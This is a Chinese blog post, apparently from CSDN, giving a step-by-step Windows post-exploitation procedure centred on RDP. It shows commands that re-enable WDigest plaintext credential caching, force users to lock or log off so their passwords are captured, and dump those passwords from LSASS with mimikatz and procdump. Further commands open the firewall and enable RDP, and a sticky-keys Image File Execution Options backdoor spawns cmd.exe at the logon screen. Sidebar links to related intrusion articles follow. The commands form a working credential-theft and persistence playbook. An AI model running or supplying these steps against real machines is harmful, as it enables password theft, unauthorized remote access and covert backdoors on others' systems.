后渗透之搞定RDP简析

最新推荐文章于 2024-06-19 19:45:00 发布
最新推荐文章于 2024-06-19 19:45:00 发布
阅读量469 收藏 1
点赞数
分类专栏: WindowsOS 文章标签: windows
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Jietewang/article/details/118825706
版权

目录

1.提取Windows Server 2012之后版本的登录密码

2.远程登录

3.Shift粘滞建后门-映像劫持

1.提取Windows Server 2012之后版本的登录密码

    Windows服务器自2012始默认是不存储明文密码的,使用常规的渗透方法(mimikatz+procdump64.exe)是获取不到密码。但是这个问题能难倒我,怎么难得倒足智多谋的社会人呢?

需要修改注册表(# 注意如果执行修改、查询注册表命令失败时建议切换后门管理工具

reg add HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 1

在修改注册表的时候,使用的测试系统是没有注册表项(UseLogonCredential) ,使用命令行添加

执行完成后会发现注册表里会多一个东西

需要锁频迫使用户重新登录,需要管理员权限才能执行该命令,关于rundll32.exe请查阅微软官网的指导说明。

rundll32.exe user32.dll,LockWorkStation # 锁屏

 查询用户ID,注销已登录用户,实战环境中建议慎用。

query user

通过id注销已登录用户,就是把用户挤下去让他在登陆一遍,这样系统就会记录登录用户的明文密码了。

logoff ID 

然后再利用工具(mimikatz+procdump64.exe)获取明文密码 

mimikatz.exe

privilege::debug

sekurlsa::logonpasswords exit

 也可以使用(procdump64.exe+mimikatz)在本次提取密码,效果一样,注释纯属见文识意并不十分准确。

procdump64.exe -accepteula -ma lsass.exe lsass.dmp #从lsass.exe导出配置文件并保存为lsass.dmp
mimikatz.exe "sekurlsa::minidump lsass.dmp" "sekurlsa::logonPasswords full" "exit" # 提取lsass.dmp的内容

2.远程登录

在拿到密码后当然需要远程登录一波了, 根据本次实战环境发现运维人员修改了3389端口,使用命令查询修改后的端口,原理就是查询注册表PortNumber的值,修改端口时也需要修改该参数。

 REG query HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\WinStations\RDP-Tcp /v PortNumber

 该值默认是16进制,需要转换一下

 开启远程桌面,在开启远程桌面前需要配置防火墙策略

防火墙策略配置netsh advfirewall firewall add rule name="Remote Desktop" protocol=TCP dir=in localport=3389 action=allow

Windows 2012

wmic /namespace:\\root\cimv2\terminalservices path win32_terminalservicesetting where (__CLASS !="") call setallowtsconnections 1

Windows 2008

REG ADD "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 0x00000d3d /f

3.Shift粘滞建后门-映像劫持

 本内容来自好友【shy014】

粘滞建后门是Windows的一个特性,目的是为了方便手指不方便的人,俗话说的好“本来网络是安全,自从有了研究安全的人之后就开始不安全了”。

 该隐患的原理就是替换"Options\sethc.exe"文件为"C:\windows\system32\cmd.exe",当正常调用粘滞建功能时就会调用cmd命令行。

REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe" /v Debugger /t REG_SZ /d "C:\windows\system32\cmd.exe"

当再次连续5次点击Shift时就会弹出cmd命令行

 补充

netsh advfirewall firewall show rule name="Remote Desktop" # 查看策略

​​​​​​​

Jietewang
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
内网渗透-Windows RDP凭证的抓取和密码破解测试的方法
lza20001103的博客
09-02 1593
Windows RDP凭证的抓取和密码破解【密码抓取和爆破】 文章目录Windows RDP凭证的抓取和密码破解【密码抓取和爆破】破解原理凭证的查看查看凭证命令在线破离线破解 破解原理 Credentials的解密是Windows系统信息收集中非常重要的一环,其中包括各类敏感、重要的凭证 (这个可以理解为密码) , 接下来我们就讲解RDP凭证的抓取和破解。 在我们点击保存密码后,Windows就通过MasterKey将我们的密码加密后保存在本地, 由于Windows还需要解密从而使用,所以这个过程
【湃哒星说安全】内网渗透技巧之RdpThief实践
PaidaxingSec的博客
11-22 710
在实际渗透过程中,各种口令凭据的窃取是一种美妙的艺术。而我们发现,登录 RDP 会话的凭据权限都比较高,除却通过 lsass.exe 来窃取口令外,RdpThief 应用而生。本文主要结合工具 CobaltStrike 以及 RdpThief 进行测试实验,以及些许原理的说明。
渗透之攻击RDP之利用凭据传递攻击(Path The Hash)
Jietewang的博客
08-08 914
在之前的文章中[后渗透搞定RDP简析]介绍了关于Windows Server 2012之后的版本不存储明文密码。 但是依旧可以通过修改注册表和mimikatz来达到获取密文密码的目的 reg add HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 1 根据上...
死磕RDP协议,从截图和爆破说起
最新发布
2401_85027544的博客
06-19 1340
到这里,本篇文章已经接近尾声了,不论是工具的研发,还是各工具RDP截图或者暴力破解的测试,都花费了大量的时间和精力,最终成文的目的不是把其他工具贬的一文不值,它们都是先行者,前人开路,后人才能在更高的起点出发,只是希望我们都能在使用过程中发现工具存在的不完美的时候,敢于发声和吐槽,甚至尝试去改变,借假修真使工具变的更好。什么是假,什么是真?佛学中讲,身体是假,佛道是真。工具从无到有,又从有到精,工具是假,技术是真,于工具是如此,于行业、于自身亦是如此,最终目的其实借事修人。
.NET Core 如何判断程序是否在远程桌面(RDP)下运行
dotNET跨平台
02-09 1055
点击上方蓝字关注“汪宇杰博客”导语由于疫情的关系,很久没发文章了。今天终于稳定下来在家办公,抽空分享一个刚学会的技巧。最近在家办公的程序员可能避免不了要用远程桌面,那么问题来了,你的 ....
RDP协议详解
rjc_lihui的专栏
03-24 4418
rdp协议详解
渗透之那些显为人知的RDP漏洞
把自己活成一道光,因为你不知道,谁会借着你的光,走出了黑暗。请保持心中的善良,因为你不知道,谁会借着你的善良,走出了绝望。请保持你心中的信仰,因为你不知道,谁会借着你的信仰,走出了迷茫。请相信自己的力量,因为你不知道,谁会因为相信你,开始相信了自己....
12-08 2331
远程桌面对了解内网渗透的人来说可能再熟悉不过了。在渗透测试中,拿下一台主机后有时候会选择开 3389 进远程桌面查看一下对方主机内有无一些有价值的东西可以利用。但是远程桌面的利用不仅如此,本节我们便来初步汇总一下远程桌面在内网渗透中的各种利用姿势。
FreeRDP-FreeRDP-1.0.1-217-gc0fcf6a.zip_FreeRDP_freerdp安卓下载_remot
09-19
在本案例中,我们讨论的是针对Android平台的FreeRDP版本,文件名"FreeRDP-FreeRDP-1.0.1-217-gc0fcf6a.zip_FreeRDP_freerdp安卓下载_remote"暗示这是一款更新到特定Git提交哈希(c0fcf6a)的Android应用。...
SharpRDPLog:Windows rdp相关的登录记录导出工具,可用于后渗透Windows服务器的信息收集阶段。输出内容包括:本地rdp端口、mstsc缓存、cmdkey缓存、登录成功、失败日志事件
05-29
Windows rdp相关的登录记录导出工具,用于后渗透Windows服务器的RDP相关的信息收集。输出内容包括:本地rdp端口、mstsc缓存、cmdkey缓存、登录成功、失败日志事件。 运行前需要bypassUAC后的管理员权限权限 说明 ...
freerdp编译文件wfreerdp.exe
10-31
源码可以从github上下载,资源为编译后的exe文件,包含win32和win64 freerdp 常用参数说明: //远程电脑 wfreerdp.exe /u:用户名 /v:目标主机地址 //远程电脑(无需输入密码) wfreerdp.exe /u:用户名 /v:目标主机...
FreeRDP-Configuration-Manual_FreeRDP_
10-01
**FreeRDP配置手册详解** FreeRDP是一个开源的远程桌面协议(RDP)客户端实现,它允许用户在各种操作系统上连接到Windows服务器或桌面环境。本篇将详细讲解FreeRDP的配置及其相关知识点,帮助你更好地理解和使用这一...
Windows RDP远程代码执行高危漏洞加固指南
乐大厨串串香飘万里
10-20 849
序号漏洞类型风险等级漏洞主机( 操作系统及版本)1Windows RDP远程代码执行高危漏洞高Windows
RDP协议流程详解(概述)
ryanzzzzz的博客
10-04 3063
(4)资源共享和远程应用程序:通过RDP协议,用户不仅可以访问远程计算机的桌面,还可以共享远程计算机上的文件、打印机和其他资源。RDP协议是一种强大而实用的远程访问协议,它提供了可视化桌面访问、安全的数据传输、多用户支持以及资源共享等特点,广泛应用于远程办公、技术支持和服务器管理等领域。(1)可视化桌面访问:RDP协议允许用户通过网络远程访问和操作远程计算机的桌面,就像在本地计算机上一样。(2)可靠且安全的传输:RDP协议使用可靠的TCP/IP协议来传输桌面、键盘、鼠标和其他设备的数据。
RDP(远程桌面协议)的应用-3389
wzhua的博客
08-13 2673
RDP(远程桌面协议)的应用-3389
渗透-------五种远程开启3389端口方法
weixin_34392435的博客
07-30 5258
3389端口是远程登入使用的默认端口,在渗透测试和系统安全配置中起到举足轻重的地位。因此,这里根据资料和个人见解整理了几种远程打开3389端口的方法,仅做参考! 以下共五种方法,其中一、四针对服务,二、三、五使用应用软件,希望对你有帮助。 一、打开记事本,编辑内容如下: echo[Components]>c:\sql echoTSEnable=on>>c:\sql ...
RDP协议
duoerbasilu
07-22 188
RDP,远程显示协议(Remote Display Protocol )简称RDP。提供了客户和服务器之间的连接。该协议是对国际电信联盟发布的一个国际标准的多通道会议协议T.120 的一个扩展。Shadow Session,映像会话是MetaFrame 的一项重要功能,用户可以通过这项功能映像其它用户的桌面。管理员可以通过映像会话指导用户使用软件和系统,也可以用来监视客户机运行情况。MetaF...
Windows远程桌面(RDP)密码凭证获取 (゚益゚メ) 渗透测试
寻觅的博客
03-07 5669
文章目录RDP连接记录MySQL数据库密码破解WiFi密码获取浏览器相关记录其他可造成安全隐患软件NacicatXmangagerTeamview RDP连接记录 MySQL数据库密码破解 WiFi密码获取 浏览器相关记录 其他可造成安全隐患软件 Nacicat Xmangager Teamview ...
什么是远程桌面协议 (RDP)?远程桌面协议 (RDP) 替代方案
SplashtopLoki的博客
01-17 4252
随着越来越多的公司采用混合工作队伍,我们看到对灵活的远程工作解决方案的需求大幅增加。领导者正在寻找现有的解决方案,例如用于这些解决方案的远程桌面协议(RDP)。在这篇博客文章中,我们讨论了什么是远程桌面协议、它是如何工作的,以及组织可以为远程工作策略做些什么。
渗透测试:切换shell,关闭防火墙,开启RDP及远程用户连接
"本文主要介绍了如何进行渗透测试的基础操作,包括如何切换shell,关闭防火墙,开启远程桌面协议(RDP)服务,以及创建新用户进行远程连接。在实验环境中,攻击机使用的是Kali Linux,而靶机是Windows 7。通过...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值